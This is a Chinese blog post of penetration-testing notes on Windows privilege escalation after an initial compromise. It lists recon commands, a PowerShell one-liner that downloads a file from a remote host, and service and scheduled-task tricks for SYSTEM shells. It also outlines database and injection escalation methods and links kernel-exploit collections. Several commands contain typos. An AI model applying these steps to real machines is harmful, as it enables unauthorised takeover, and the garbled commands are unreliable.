后渗透提权

最新推荐文章于 2024-01-08 09:52:38 发布
最新推荐文章于 2024-01-08 09:52:38 发布
阅读量320 收藏 2
点赞数 1
分类专栏: # 基础学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ppbgi/article/details/116952632
版权

常用信息收集命令

systeminfo  打印系统信息

在这里插入图片描述

whoami/priv  当前帐户权限

在这里插入图片描述

ipconfig/dispalydns  显示dns信息

在这里插入图片描述

route print 打印路由表

在这里插入图片描述

arp -a   打印arp表
net user  列出表名
net user username  关于用户的信息
net use \SMBPATH Pa$$wOrd/u:username  连接SMB
net localgroup  列出所有组 
net view\127.0.0.1   会话打开到当前计算机
net session  开放给其他机器
netsh firewall show config  显示防火墙配置
DRIVERQUERY	 列出安装的驱动
tasklist /svc  列出服务任务
net start  列出启动的服务
dir /s foo  在目录中搜索包含指定字符的项目
dir /s foo == bar 同上
sc query 列出所有服务
sc qc servicename  找到指定服务的路径
shutdown /r /t 0  重启
type file.txt  打印内容
icacls "C:\example"  列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn  列出已进安装的补丁
New-Object System.Net.WebClient).DownloadFile(“http://host/file”,”C:\LocalPath”) 利用ps远程下载文件搭配本地
accesschk.exe -qwsu "Group" 修改对象 
quser or query user 获取在线用户 
netstat -ano | findstr 3389 获取rdp连接来源ip
dir c:\programdata\  分析安装杀软
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber    #获取远程端口
tasklist /svc | find "TermService" + netstat -ano  		  #获取远程端口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

收集补丁信息:找到没有进行补丁的编号,尝试通过ms系列提权;
收集服务器作用:判断是否有可提权的服务或杀软服务,不同杀软不同绕过方式;
收集权限作用:根据权限来判断是否进行提权;
收集网络配置信息:可以后期横向扩展

windows提权

  • 提权分类

系统溢出漏洞
第三方服务提权
数据库提权
本地提权

系统溢出提权
手工查找补丁情况:
systeminfo
Wmic qfe get Caption,Description,HotFixID,InstaslledON

MSF后渗透扫描:
post/windows/gather/enum_pathes

PowerShell扫描:
Imoprt-Mouble C:\Sherlock.ps1
Find-AllVulns

补丁漏洞查找网站:
https://github.com/ianxtianxt/win-exp-
https://github.com/SecWiki/windows-kernel-exploits

Psexec提权:
使用Psexec工具打开system权限的cmd窗口,其中:i 表示交互式,s 表示system移动到这个目录下,方便直接打开。

AT提权:
系统调度任务的命令
at 14:53 /interactive cmd
以system的权限打开cmd,之后在此cmd打开的应用都是system的权限

窗口权限提权:
在system权限的窗口中打开任务管理器(taskmgr),然后结束桌面进程,创建一个新的桌面进程(explorer),以后在桌面中打开的cmd窗口都是以system权限运行的。

服务方式提权:
采用服务方式提权,这是因为所有的服务都会默认以system账号去启动,所以借助这个思路,去创建一个服务(打开cmd服务),之后启动这个服务,打开的cmd命令行窗口就是以system权限启动的。
sc Create SuperCMD binpath= “cmd /k start” type= own type= interact
Sc start SuperCMD
Sc delete SuperCMD

注入进程提权:
Pinjector找一个system运行的服务进程,把自己注入到进程里面,注入到进程里面就和进程有同样的用户权限,即system

第三方服务提权
步骤:
信息收集阶段
收集软件的版本信息
收集软件目录端口信息
根据相关信息利用公开EXP提权
上传大马进行提权操作
针对不同软件有不同思路
1.FTP提权
serv-u 提权\G6-FTP提权\FileZilla提权\FlashFXP提权\PcAnywhere提权\Xlight FTP Server 提权
2.远程软件提权
VNC提权Radmin hash 提权漏洞

数据库提权
1.Mysql提权
udf提权
启动项提权
mof提权
2.SQL Server提权
利用xp_cmdshell提权
使用sp_oacreate进行提权
使用沙盒进行提权
3.Oracle提权

本地提权
1.溢出提权
远程溢出
本地溢出
2.Getpass提权
3.hash传递入侵
4.lpk提权

其他

在这里插入图片描述

  • 常见的网站编译器

FCKeditor
eWebEditor
Cute Editor
Webhtmleditor
Kindeditor
Freetextbox

编译器详细讲解:https://www.jb51.net/article/26841.htm

Hero.Youth
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透提权的必要性和思路
不忘初心,护天下安全!
10-14 2489
而后渗透的本质是权限把控,既包含了内网横向渗透获取更多数据和计算机控制权限,也包含在当前计算机中不断提升自己获取到的权限和管理范围,以实现自己对“肉鸡”更为长久地控制和更为深入的接管。低的权限级别将使我们受到很多的限制,在实施横向渗透或者进行持久化工作时将很困难,例如在Windows主机上如果没有管理者权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guset提升到User,再到Administrator,最后到System级别。
部分渗透提权文章
04-16
"部分渗透提权文章"的主题聚焦于如何在获取初步访问权限后,进一步提升权限,进行内网渗透,以及在Linux环境下的相关技巧。这里我们将深入探讨XSS(跨站脚本)攻击、社会工程学利用,以及提权的基本概念和实践案例。...
记录一次后渗透提权
春日野穹
09-27 2522
前言~ 提权,顾名思义就是提高自己在服务器中的权限,当我们通过各种方法渗透进入一台服务器的内部,往往我们能的到的权限是很低的,当我们得到一个低权限的shell时,就需要进行进一步操作,即提权。想要提权就需要进行信息收集,如果不能清除的了解一个网站的完整架构,哪下一步就无法行动,所以我们需要了解这个shell的主机是做什么的,我们拥有什么样的权限,面对的是怎样一个系统等。通过一些简单地信息收集,可...
渗透之权限提升(2)
qq_52178795的博客
07-13 217
渗透之权限提升
渗透攻击:权限提升
岁月净好
11-22 575
渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或Linux操作系统中root账户的权限。提升权限的方式分为以下两类。 纵向提权:低权限角色获得高权限角色的权限,例如,一个WebShell权限通过提权之后拥有了管理员的权限,那么这种提权就是纵向提权,也称做权限升级 横向提权:获取同级别角色的权限。例如:通过已经攻破的系统A获取了系统 B的权限,那么这种提权就属于横向提权。 所以在成功获取目标机Meterpreter Shell后,我们要知道现在已经拥有了什么权限。   
渗透之权限提升(学习记录)
qq_62370574的博客
03-15 686
本来兴致勃勃的想要学一下内网横向渗透的,结果发现其他人随随便便用永恒之蓝就直接拿到了system权限,但同样的靶机,自己电脑上的永恒之蓝完全没用,于是干脆复习了一遍window下的权限提升方法。 (本文主要是针对windows提权方法进行总结,在实验中以win7为例,采用的提权方法均失败了,想要看到成功截图的请移步其他大佬的博客) 靶机是win7的系统,登录的账户为demo\douser,是demo域下的一个普通域成员
渗透提权工具
05-21
提权工具,Nc,pr,巴西烤肉,等等所有提权工具
Windows渗透提权技巧
05-05
在网络安全领域,Windows渗透提权技巧是至关重要的部分,主要涉及如何在未经授权的情况下发现并利用系统的漏洞,以及如何从低权限用户身份提升到管理员权限。以下是对这一主题的详细阐述: 1. **Windows渗透技术*...
常见windwos提权笔记
最新发布
03-30
- **cobalt strike**: 一种先进的渗透测试框架,支持多种提权技术。 - **过程**: 通常先通过webshell上线到CS,再通过CS提供的功能进行提权。 ##### 5.3 MSF(Metasploit Framework)的shell - **Metasploit**: 强大...
ASP大马(渗透网站)
05-25
作用不错,可以上传下载文件,可以检测补丁,可以进行server-u提权,可以执行cmd命令,可以隐藏小马
PenetrationTest-Tips:渗透测试,渗透测试小技巧,渗透测试技巧,师傅们跟我一起维护更新吧〜
03-06
渗透测试提示-版本1.3(后续进行分类,倒叙排序,以及美化格式,师傅们先将就一下〜) 希望师傅们可以分享一些个人渗透测试提示,提交方式在下面 转载请保留来源 更新日志 2021年01月20日-建立仓库,编写前言,更新渗透测试Tips 1-34个技巧 2021年01月21日-整理来自tools师傅们留言的渗透测试提示 2021年01月26日-整理了几天来自工具师傅们的留言以及个人的渗透测试 2021年01月28日-整理更新了第38〜48,所学习到的渗透测试提示 2021年01月29日-整理更新了第49〜59,所学习到的渗透测试Tips,以及来自工具师傅们部分Tips 2021年02月04日-整理了一些师傅们留言贡献的渗透测小贴士 食用指南&前言 首发于工具,应各位师傅的支持以及建议,遂开了这个github,本着众人拾柴火焰高,你的一滴水,我的一滴水,最终汇聚聚成汪洋的渗透测试之海的想法,做
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
weixin_51803729的博客
02-12 5239
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
渗透通过meterpreter模块提权
bring_coco的博客
11-06 940
继上一篇得到的普通session进行提权 提权方法: 一.提高程序的运行级别(uac) 说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高权限的shell Msf模块: Exploit/windows/local/ask 1.试试看可不可以直接得到system权限 发现有报错 2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要提权的session 此
[渗透测试]—7.3 内网渗透提权技术
wuli1024的博客
01-08 1205
内网渗透是指攻击者在成功进入目标网络后,对内部资源进行横向渗透以获取更多权限和信息的过程。
渗透测试—提权方式总结
qq_29864185的博客
07-06 1848
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
渗透后台提权后爬取某公司信息
null
09-23 450
没反爬,某种原因所以 全面向过程 import urllib.parse import urllib.request import time import threading def DiYi(): bianhao = 1 while True: url = 'http://pmsadmin.estay.com/crs/query_order_list?page_index='+str(bianhao)+'&page_size=20&asd=1&as
Windows内网渗透提权的几个实用命令
ming2008tian的博客
09-26 2099
1.获取操作系统信息识别操作系统名称及版本:C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" OS Name: Microsoft Windows 10 Pro OS Version: 10.0.14393 N/A Build 14393当然中文系统你得这样:systeminfo | findstr /B /
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1133
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
网络攻防技巧:提权渗透经验总结
渗透测试中,提权是一个关键环节,它指的是攻击者在获得系统一部分权限后,尝试提升到管理员或者更高的权限级别,以获取更广泛的系统访问权。以下是文中提到的一些提权技术和方法: 1. **读取网站配置**:攻击者...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值